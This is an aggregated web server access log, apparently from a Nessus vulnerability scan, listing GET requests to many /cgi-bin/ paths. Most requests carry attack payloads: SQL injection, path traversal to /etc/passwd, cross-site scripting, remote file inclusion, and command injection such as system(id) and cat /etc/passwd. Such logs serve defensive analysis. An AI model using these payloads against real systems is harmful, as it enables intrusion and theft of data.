1 GET /cgi-bin/index.php?action=view&module=resourcesmodule&id=0%20UNION%20SELECT%20-1%2c%27exponent_0964.nasl%27%2c%27Nessus%20test%27%2c%27O%3a8%3a%22stdClass%22%3a3%3a%7bs%3a3%3a%22mod%22%3bs%3a15%3a%22resourcesmodule%22%3bs%3a3%3a%22src%22%3bs%3a20%3a%22%40random41940ceb78dbb%22%3bs%3a3%3a%22int%22%3bs%3a0%3a%22%22%3b%7d%27%2c7%2c0%2c0%2c0%2c0%2c0%2c0%20-- HTTP/1.1
1 GET /cgi-bin/index.php?album=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/index.php?board=nonexistant1515802879 HTTP/1.1
1 GET /cgi-bin/index.php?c=access&a=login&ref_c=nessus%22%3e%3cscript%3ealert%28863909431%29%3c%2fscript%3e&ref_a=projectpier_login_page_xss.nasl%22%3e%3cscript%3ealert%28779008214%29%3c%2fscript%3e HTTP/1.1
1 GET /cgi-bin/index.php?cat_select=<script>foo</script> HTTP/1.1
1 GET /cgi-bin/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc HTTP/1.1
1 GET /cgi-bin/index.php?configFile=../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/index.php?doc=http[:]//example[.]com/foo.php HTTP/1.1
1 GET /cgi-bin/index.php?edit=nonexistant1701826391 HTTP/1.1
1 GET /cgi-bin/index.php?entry=' HTTP/1.1
1 GET /cgi-bin/index.php?fields=CHAR(49,39,41,59,101,118,97,108,40,98,97,115,101,54,52,95,100,101,99,111,100,101,40,36,95,83,69,82,86,69,82,91,72,84,84,80,95,78,69,83,83,85,83,95,67,77,68,93,41,41,59,47,47),1 HTTP/1.1
1 GET /cgi-bin/index.php?file=Liens&op=\"><script>window.alert('test');</script> HTTP/1.1
1 GET /cgi-bin/index.php?file=News&op=phpinfo HTTP/1.1
1 GET /cgi-bin/index.php?gadget=../../../../../../etc/passwd%00&path=/etc HTTP/1.1
1 GET /cgi-bin/index.php?gadget=Glossary&action=ViewTerm&term=%3cscript%3ealert%28%27jaws_xss.nasl%27%29%3b%3c%2fscript%3e HTTP/1.1
1 GET /cgi-bin/index.php?gadget=Glossary&action=view&term=%3cscript%3ealert%28%27jaws_xss.nasl%27%29%3b%3c%2fscript%3e HTTP/1.1
1 GET /cgi-bin/index.php?getApplication=register&checknum=1&args=null HTTP/1.1
1 GET /cgi-bin/index.php?get_action=get_boot_conf HTTP/1.1
1 GET /cgi-bin/index.php?go=detail&id=-99999/**/UNION/**/SELECT/**/0,1,concat(1717627930,0x3a,494874244),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 HTTP/1.1
1 GET /cgi-bin/index.php?go=detail&id=-99999/**/UNION/**/SELECT/**/0,1,concat(1717627930,0x3a,494874244),3,4,5,6,7,8,9,10,11,12,13,14,15,16 HTTP/1.1
1 GET /cgi-bin/index.php?id='UNION/**/SELECT/**/0,0,1470371322,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- HTTP/1.1
1 GET /cgi-bin/index.php?id=' HTTP/1.1
1 GET /cgi-bin/index.php?id=7kxgk6o2hd' HTTP/1.1
1 GET /cgi-bin/index.php?inc=http[:]//example[.]com/foo HTTP/1.1
1 GET /cgi-bin/index.php?include_files[]=&include_files[query_string]=/etc/passwd HTTP/1.1
1 GET /cgi-bin/index.php?kietu[url_hit]=http[:]//example[.]com/ HTTP/1.1
1 GET /cgi-bin/index.php?libDir=http[:]//example[.]com HTTP/1.1
1 GET /cgi-bin/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl HTTP/1.1
1 GET /cgi-bin/index.php?mod_id=2&kb_ask=%3c%2ftextarea%3e%3cscript%3ealert%28%22cerberus_support_center_mult_flaws.nasl%22%29%3c%2fscript%3e HTTP/1.1
1 GET /cgi-bin/index.php?mode=administration HTTP/1.1
1 GET /cgi-bin/index.php?module=<script>foo</script> HTTP/1.1
1 GET /cgi-bin/index.php?module=Navigation HTTP/1.1
1 GET /cgi-bin/index.php?module=Topics&func=view&topicid=-1%20UNION%20SELECT%20null%2cnull%2c%27mdpro_topicid_sql_injection.nasl-1717627947%27%2cnull%2cnull%2cnull%2cnull%20-- HTTP/1.1
1 GET /cgi-bin/index.php?module=ew_filemanager&type=admin&func=manager HTTP/1.1
1 GET /cgi-bin/index.php?name=Your%20Account&profile=anyone%22%3E%3Cscript%3Ealert('Nessus%20was%20here')%3B%3C%2Fscript%3E HTTP/1.1
1 GET /cgi-bin/index.php?op=Default&Date=200607%27%20UNION%20SELECT%201%2c1204168859%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1--&blogId=1 HTTP/1.1
1 GET /cgi-bin/index.php?op=ViewAlbum&albumId=-1/**/UNION/**/SELECT/**/0,1,1602970821,943137723,1,1,1,1,1--&blogId=1 HTTP/1.1
1 GET /cgi-bin/index.php?op=ViewArticle&articleId=9999%2f%2a%2a%2fUNION%2f%2a%2a%2fSELECT%2f%2a%2a%2f1717627951%2c1%2c1%2c1%2c1%2c1%2c1%2c1--&blogId=1 HTTP/1.1
1 GET /cgi-bin/index.php?op=disp&filedata=c3lzdGVtKCdpZCcpOw== HTTP/1.1
1 GET /cgi-bin/index.php?option=frontpage&Itemid=2|system(id)|1717627950 HTTP/1.1
1 GET /cgi-bin/index.php?option=weblinks&Itemid=2&catid=-1%20UNION%20SELECT%200%2c1%2c2%2c736256766954%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11-- HTTP/1.1
1 GET /cgi-bin/index.php?owa_do=base.loginForm HTTP/1.1
1 GET /cgi-bin/index.php?p='nessus HTTP/1.1
1 GET /cgi-bin/index.php?page=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/index.php?page=documents&doc=-99%27%20UNION%20SELECT%20null,null,%27nessus%27,%27dcpportal_sql.nasl%27,null,null,null,null,null,null,null,null-- HTTP/1.1
1 GET /cgi-bin/index.php?page=send&cid=%3cscript%3ealert(%27dcpportal_sql.nasl%27)%3c%2fscript%3e HTTP/1.1
1 GET /cgi-bin/index.php?post=../config/password HTTP/1.1
1 GET /cgi-bin/index.php?req_path=http[:]//example[.]com/ HTTP/1.1
1 GET /cgi-bin/index.php?s=admin/%5cthink%5capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /cgi-bin/index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /cgi-bin/index.php?s=index/%5cthink%5cRequest/input&filter=file_get_contents&data=index.php HTTP/1.1
1 GET /cgi-bin/index.php?search=%3cscript%3ealert%28%27cmsimple_search_xss.nasl%27%29%3b%3c%2fscript%3e&function=search HTTP/1.1
1 GET /cgi-bin/index.php?search='>%3Cscript%3Ealert('autoindex_search_xss.nasl')%3B%3C%2Fscript%3E&searchMode=f HTTP/1.1
1 GET /cgi-bin/index.php?search=<script>foo</script> HTTP/1.1
1 GET /cgi-bin/index.php?selskin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
1 GET /cgi-bin/index.php?selskin=..%2Finc%2Fboxleft.inc%00&xposbox[L][]=%2Fetc%2Fpasswd%00 HTTP/1.1
1 GET /cgi-bin/index.php?sensor_program=%3cscript%3ealert%28%27phpsysinfo_multiple_xss.nasl%27%29%3b%3c%2fscript%3e HTTP/1.1
1 GET /cgi-bin/index.php?setLang=gcards_dir_transversal.nasl&lang[gcards_dir_transversal.nasl][file]=../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/index.php?show=../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/index.php?show=/etc/passwd HTTP/1.1
1 GET /cgi-bin/index.php?show=http[:]//example[.]com/nessus HTTP/1.1
1 GET /cgi-bin/index.php?site=../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/index.php?src=1&_common=1&time=1717627958&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/index.php?string=' HTTP/1.1
1 GET /cgi-bin/index.php?template=../../../loudblog/custom/config.php%00 HTTP/1.1
1 GET /cgi-bin/index.php?templates_dir=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/index.php?user_langue=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/index.php?x=browse&category='UNION%20SELECT%20%271%27%2c%272%27%2c%27pixelpost_category_sql_injection.nasl%27%2c%271717627937%27%2c%275%27-- HTTP/1.1
60 GET /cgi-bin/index.php HTTP/1.1
1 GET /cgi-bin/index.phtml?mode=view&album=id&pic=A=10.jpg&dispsize=640&start=0 HTTP/1.1
1 GET /cgi-bin/index.phtml HTTP/1.1
1 GET /cgi-bin/index.pl/homels?func=add;class=WebGUI::Asset::Wobject::Article%3bprint%20%60id%60; HTTP/1.1
7 GET /cgi-bin/index.pl HTTP/1.1
7 GET /cgi-bin/index.sh HTTP/1.1
1 GET /cgi-bin/index2.cgi?frames=yes&board=demo&mode=Current&threads=Collapse&message=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/index2.php?_SERVER[]=&_SERVER[REMOTE_ADDR]='.system('id').exit().'&option=wrapper&module[module]=1 HTTP/1.1
1 GET /cgi-bin/index HTTP/1.1
1 GET /cgi-bin/info.dat HTTP/1.1
1 GET /cgi-bin/info.php HTTP/1.1
1 GET /cgi-bin/info/refs?service=git-upload-pack HTTP/1.1
1 GET /cgi-bin/info2www HTTP/1.1
1 GET /cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id HTTP/1.1
1 GET /cgi-bin/insertorder.cfm?CFID=1&CFTOKEN=1%20UNION%20SELECT%201%2c2%2c3%2c4%2cstorename%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13%2c14%2c15%20from%20Params%22having%201%3d1 HTTP/1.1
1 GET /cgi-bin/install.php?newlang=../../cpg_error.log%00 HTTP/1.1
1 GET /cgi-bin/install/index.php HTTP/1.1
1 GET /cgi-bin/interface/index.do HTTP/1.1
1 GET /cgi-bin/ion-p.exe?page=../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/ion-p.exe?page=c:\\\\winnt\\\\win.ini HTTP/1.1
1 GET /cgi-bin/item.fts?href=%22%3E%3Cscript%3Ealert%28%22ftgate_44002.nasl%22%29%3C%2Fscript%3E%3B HTTP/1.1
1 GET /cgi-bin/j6HJKBQKYKJF.asp HTTP/1.1
1 GET /cgi-bin/j6HJKBQKYKJF.cfm HTTP/1.1
1 GET /cgi-bin/j6HJKBQKYKJF.cgi HTTP/1.1
1 GET /cgi-bin/j6HJKBQKYKJF.html HTTP/1.1
1 GET /cgi-bin/j6HJKBQKYKJF.inc HTTP/1.1
1 GET /cgi-bin/j6HJKBQKYKJF.php3 HTTP/1.1
1 GET /cgi-bin/j6HJKBQKYKJF.php HTTP/1.1
1 GET /cgi-bin/j6HJKBQKYKJF.pl HTTP/1.1
1 GET /cgi-bin/j6HJKBQKYKJF.sh HTTP/1.1
1 GET /cgi-bin/j6HJKBQKYKJF.shtml HTTP/1.1
1 GET /cgi-bin/jammail.pl?job=showoldmail&mail=|id| HTTP/1.1
1 GET /cgi-bin/jammail/jammail.pl?job=showoldmail&mail=|id| HTTP/1.1
1 GET /cgi-bin/javascript.php?abs_path=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/javascripts/enrollment.js HTTP/1.1
1 GET /cgi-bin/jcart-relay.php HTTP/1.1
1 GET /cgi-bin/jgs_portal_statistik.php?meinaction=themen&month=1&year=1' HTTP/1.1
1 GET /cgi-bin/js/vendors.php?file=../../../../../../../../../../etc/passwd%00nessus.js HTTP/1.1
1 GET /cgi-bin/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor HTTP/1.1
1 GET /cgi-bin/kernel/loadkernel.php?installPath=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/kvm.cgi?&file=login HTTP/1.1
1 GET /cgi-bin/landesk/vboot/default.winpemanaged HTTP/1.1
1 GET /cgi-bin/lang/index.php?file=/etc/passwd HTTP/1.1
1 GET /cgi-bin/lang/lang.php?lang_path=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/language.php?data_dir=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/lg.php HTTP/1.1
1 GET /cgi-bin/lib.inc.php?pm_path=http[:]//example[.]com&sfx=.txt HTTP/1.1
1 GET /cgi-bin/lib/OWL_API.php?xrms_file_root=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
1 GET /cgi-bin/lib/adodb/tests/tmssql.php?do=phpinfo HTTP/1.1
1 GET /cgi-bin/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7b%7dsystem%28id%29%3bclass%20zZz_ADOConnection%7b%7d%2f%2f HTTP/1.1
1 GET /cgi-bin/lib/authform.inc.php?path_pre=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/lib/dbman_filter.inc.php?lib_path=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/lib/specialdays.php?path_pre=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/lib/version.phps HTTP/1.1
1 GET /cgi-bin/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
1 GET /cgi-bin/library.cgi HTTP/1.1
1 GET /cgi-bin/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
1 GET /cgi-bin/library/adodb/tests/tmssql.php?do=phpinfo HTTP/1.1
1 GET /cgi-bin/library/lib.php?root=http[:]//example[.]com HTTP/1.1
1 GET /cgi-bin/list.php HTTP/1.1
1 GET /cgi-bin/listinfo/ HTTP/1.1
1 GET /cgi-bin/listing.php HTTP/1.1
1 GET /cgi-bin/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc| HTTP/1.1
1 GET /cgi-bin/livre_include.php?no_connect=lol&chem_absolu=http[:]//example[.]com/ HTTP/1.1
1 GET /cgi-bin/loader-wizard.php?page=default HTTP/1.1
1 GET /cgi-bin/loadpage.cgi HTTP/1.1
1 GET /cgi-bin/logbook.pl?file=../../../../../../../../../../bin/cat%20/etc/passwd%00| HTTP/1.1
1 GET /cgi-bin/logicworks.ini HTTP/1.1
1 GET /cgi-bin/login.action HTTP/1.1
1 GET /cgi-bin/login.cgi?username=&command=simple&do=edit&password=&file=|id| HTTP/1.1
12 GET /cgi-bin/login.cgi HTTP/1.1
1 GET /cgi-bin/login.jsp?lang=en&cntry= HTTP/1.1
1 GET /cgi-bin/login.jsp HTTP/1.1
1 GET /cgi-bin/login.mako HTTP/1.1
1 GET /cgi-bin/login.php?course=\">%3cscript%3ealert%28atutor_xss.nasl%29%3c%2fscript%3e HTTP/1.1
1 GET /cgi-bin/login.php?lang=/../../../../../../../../../../../../etc/passwd%00.txt HTTP/1.1
1 GET /cgi-bin/login.php?lang=/../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/login.php?req=\"><script>alert('testlink_login_req_param_xss.nasl-1717627927')</script> HTTP/1.1
1 GET /cgi-bin/login.php?url=editgedcoms.php HTTP/1.1
15 GET /cgi-bin/login.php HTTP/1.1
1 GET /cgi-bin/login.pl?login=ledgersmb_script_code_exec.nasl&script=-e%20print%20%22Content-Type%3a%20text%2fplain%0d%0a%0d%0a%22%3bsystem%28id%29&action=logout HTTP/1.1
1 GET /cgi-bin/login.pl HTTP/1.1
1 GET /cgi-bin/login.wdm HTTP/1.1
1 GET /cgi-bin/login/default.aspx HTTP/1.1
8 GET /cgi-bin/login HTTP/1.1
1 GET /cgi-bin/logs/HCDiskQuotaService.csv HTTP/1.1
1 GET /cgi-bin/lostpass.php HTTP/1.1
2 GET /cgi-bin/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@ HTTP/1.1
1 GET /cgi-bin/lp/AdminlogonPoint/Logon.do HTTP/1.1
1 GET /cgi-bin/lp HTTP/1.1
1 GET /cgi-bin/lsg2.cgi HTTP/1.1
1 GET /cgi-bin/luci HTTP/1.1
1 GET /cgi-bin/m0bot1qj.asp?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.asp?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.aspx?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.aspx?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.cfc?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.cfc?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.cfm?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.cfm?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.cgi?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.cgi?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.dll?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.dll?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.do?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.do?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.exe?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.exe?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.fts?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.fts?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.htm?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.htm?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.html?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.html?<script>cross_site_scripting.nasl</script> HTTP/1.1
13 GET /cgi-bin/m0bot1qj.html HTTP/1.1
1 GET /cgi-bin/m0bot1qj.idc?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.idc?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.jsp?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.jsp?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.jspa?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.jspa?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.kspx?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.kspx?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.mscgi?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.mscgi?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.nsf?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.nsf?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.php3?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.php3?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.php?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.php?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.pl?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.pl?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.x?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /cgi-bin/m0bot1qj.x?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /cgi-bin/mail.cgi HTTP/1.1
1 GET /cgi-bin/mail.php?id='/**/UNION/**/SELECT/**/1,2,1717627963,4--&blog=1 HTTP/1.1
1 GET /cgi-bin/mailbox.php3?actionID=6&server=x&imapuser=x';somesql&pass=x HTTP/1.1
7 GET /cgi-bin/mailit.pl HTTP/1.1
3 GET /cgi-bin/main.php HTTP/1.1
1 GET /cgi-bin/man-cgi?-P%20id%20ls HTTP/1.1
1 GET /cgi-bin/man-cgi?section=0&topic=ls%3bid HTTP/1.1
1 GET /cgi-bin/man2html?section=-P%20id&topic=w HTTP/1.1
1 GET /cgi-bin/man2web?program=-P%20id%20ls HTTP/1.1
1 GET /cgi-bin/manager/ HTTP/1.1
1 GET /cgi-bin/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/mapserv.exe?map=mapserver_detect.nasl.map HTTP/1.1
1 GET /cgi-bin/mapserv?map=mapserver_detect.nasl.map HTTP/1.1
1 GET /cgi-bin/math_sum.mscgi HTTP/1.1
1 GET /cgi-bin/mathtex.cgi?\\dvips\\dpi{150|id%20%3e%20%24%28ps%20ax%20%7c%20fgrep%20%22mathtex_dpi_exec.nasl-1717627947%22%20%7c%20egrep%20%22%2f%5b0-9a-fA-F%5d%2b%5c.gif%22%20%7c%20tail%20-1%20%7c%20sed%20-n%20-e%20%27s%2f.%2advips.ps%20%2f%2f%27%20-e%20%27s%2fgif%20%3econvert.%2a%2fgif%2fp%27%20%7c%20tee%20%2ftmp%2ffoo4%29%20%7c%20echo%20mathtex_dpi_exec.nasl-1717627947%20} HTTP/1.1
1 GET /cgi-bin/mathtex.pl?\\dvips\\dpi{150|id%20%3e%20%24%28ps%20ax%20%7c%20fgrep%20%22mathtex_dpi_exec.nasl-1717627947%22%20%7c%20egrep%20%22%2f%5b0-9a-fA-F%5d%2b%5c.gif%22%20%7c%20tail%20-1%20%7c%20sed%20-n%20-e%20%27s%2f.%2advips.ps%20%2f%2f%27%20-e%20%27s%2fgif%20%3econvert.%2a%2fgif%2fp%27%20%7c%20tee%20%2ftmp%2ffoo4%29%20%7c%20echo%20mathtex_dpi_exec.nasl-1717627947%20} HTTP/1.1
1 GET /cgi-bin/mathtex/mathtex.cgi?\\dvips\\dpi{150|id%20%3e%20%24%28ps%20ax%20%7c%20fgrep%20%22mathtex_dpi_exec.nasl-1717627947%22%20%7c%20egrep%20%22%2f%5b0-9a-fA-F%5d%2b%5c.gif%22%20%7c%20tail%20-1%20%7c%20sed%20-n%20-e%20%27s%2f.%2advips.ps%20%2f%2f%27%20-e%20%27s%2fgif%20%3econvert.%2a%2fgif%2fp%27%20%7c%20tee%20%2ftmp%2ffoo4%29%20%7c%20echo%20mathtex_dpi_exec.nasl-1717627947%20} HTTP/1.1
1 GET /cgi-bin/mathtex/mathtex.pl?\\dvips\\dpi{150|id%20%3e%20%24%28ps%20ax%20%7c%20fgrep%20%22mathtex_dpi_exec.nasl-1717627947%22%20%7c%20egrep%20%22%2f%5b0-9a-fA-F%5d%2b%5c.gif%22%20%7c%20tail%20-1%20%7c%20sed%20-n%20-e%20%27s%2f.%2advips.ps%20%2f%2f%27%20-e%20%27s%2fgif%20%3econvert.%2a%2fgif%2fp%27%20%7c%20tee%20%2ftmp%2ffoo4%29%20%7c%20echo%20mathtex_dpi_exec.nasl-1717627947%20} HTTP/1.1
1 GET /cgi-bin/member.php?action=login HTTP/1.1
1 GET /cgi-bin/member/index.php HTTP/1.1
1 GET /cgi-bin/mensajeitor.php HTTP/1.1
1 GET /cgi-bin/menu_dx.php?SITE_Path=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/minis.php?month=../../../../../../etc/passwd HTTP/1.1
2 GET /cgi-bin/misc.php?action=login HTTP/1.1
1 GET /cgi-bin/misc/audio.php?recording=../version.inc HTTP/1.1
1 GET /cgi-bin/misc/drupal.js HTTP/1.1
1 GET /cgi-bin/misc/info.php HTTP/1.1
1 GET /cgi-bin/mj_wwwusr HTTP/1.1
1 GET /cgi-bin/mlog.html?screen=/etc/passwd HTTP/1.1
1 GET /cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20\"Content-Type:%20text%2Fhtml\"%3Becho%20\"\"%20%3B%20id%00 HTTP/1.1
1 GET /cgi-bin/moadmin.php HTTP/1.1
1 GET /cgi-bin/module.php?module=osTicket&file=../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/module.php?module=osTicket&file=/modules/osTicket/admin.php HTTP/1.1
1 GET /cgi-bin/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1 HTTP/1.1
1 GET /cgi-bin/modules.php?name=My_eGallery HTTP/1.1
1 GET /cgi-bin/modules/Printing/output.php?url=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== HTTP/1.1
1 GET /cgi-bin/modules/TinyMCE/content_css.php?templateid=-1/**/UNION/**/SELECT/**/1717627961,1,1818577171-- HTTP/1.1
1 GET /cgi-bin/modules/core/module.inc HTTP/1.1
1 GET /cgi-bin/modules/news/ HTTP/1.1
1 GET /cgi-bin/modules/phpRPC/server.php HTTP/1.1
1 GET /cgi-bin/modules/projects/sql/install-0.9.7.php?p=2 HTTP/1.1
1 GET /cgi-bin/month.php HTTP/1.1
1 GET /cgi-bin/more.php?id=1' HTTP/1.1
1 GET /cgi-bin/mpweb/html/help/000/user_help/help/output/config.js HTTP/1.1
1 GET /cgi-bin/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini HTTP/1.1
1 GET /cgi-bin/msg.txt HTTP/1.1
7 GET /cgi-bin/mt-static/mt-check.cgi HTTP/1.1
7 GET /cgi-bin/mt-static/mt-load.cgi HTTP/1.1
1 GET /cgi-bin/mt.cgi?__mode=logout HTTP/1.1
1 GET /cgi-bin/mt/ HTTP/1.1
7 GET /cgi-bin/mt/mt-check.cgi HTTP/1.1
7 GET /cgi-bin/mt/mt-load.cgi HTTP/1.1
1 GET /cgi-bin/mt/mt.cgi?__mode=logout HTTP/1.1
1 GET /cgi-bin/mw-config HTTP/1.1
1 GET /cgi-bin/myevent.php?myevent_path=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/mylog.html?screen=/etc/passwd HTTP/1.1
1 GET /cgi-bin/myphpPageTool/doc/admin/index.php?ptinclude-http[:]//example[.]com HTTP/1.1
1 GET /cgi-bin/namazu.cgi HTTP/1.1
1 GET /cgi-bin/nbmember.cgi?cmd=test HTTP/1.1
1 GET /cgi-bin/ncbook.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 HTTP/1.1
7 GET /cgi-bin/ncbook/book.cgi HTTP/1.1
1 GET /cgi-bin/ncbook/ncbook.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 HTTP/1.1
1 GET /cgi-bin/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=PXSRJn6CaaKAeKTBv HTTP/1.1
1 GET /cgi-bin/neomail.pl HTTP/1.1
1 GET /cgi-bin/nessus%22%3e%3cscript%3ealert%28%27django_admin_xss.nasl%27%29%3c%2fscript%3e%2f HTTP/1.1
1 GET /cgi-bin/nessus/ HTTP/1.1
1 GET /cgi-bin/nessus\"><script>alert('mod_perl_status_uri_xss.nasl')</script> HTTP/1.1
1 GET /cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/netcmd.php?cmd=whois&query=|id HTTP/1.1
1 GET /cgi-bin/new-visitor.inc.php?lvc_include_dir=http[:]//example[.]com HTTP/1.1
1 GET /cgi-bin/new_images.php?order=linpha_order_sql_injection.nasl_1717627949 HTTP/1.1
1 GET /cgi-bin/news.mdb HTTP/1.1
1 GET /cgi-bin/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl HTTP/1.1
1 GET /cgi-bin/news.php HTTP/1.1
1 GET /cgi-bin/news/index.dot?id=../../../../../../../../../../../..//etc/passwd%00.jpg HTTP/1.1
1 GET /cgi-bin/newsdata/data/user.idx HTTP/1.1
1 GET /cgi-bin/newsdesk.cgi?t=../../../../../../etc/passwd HTTP/1.1
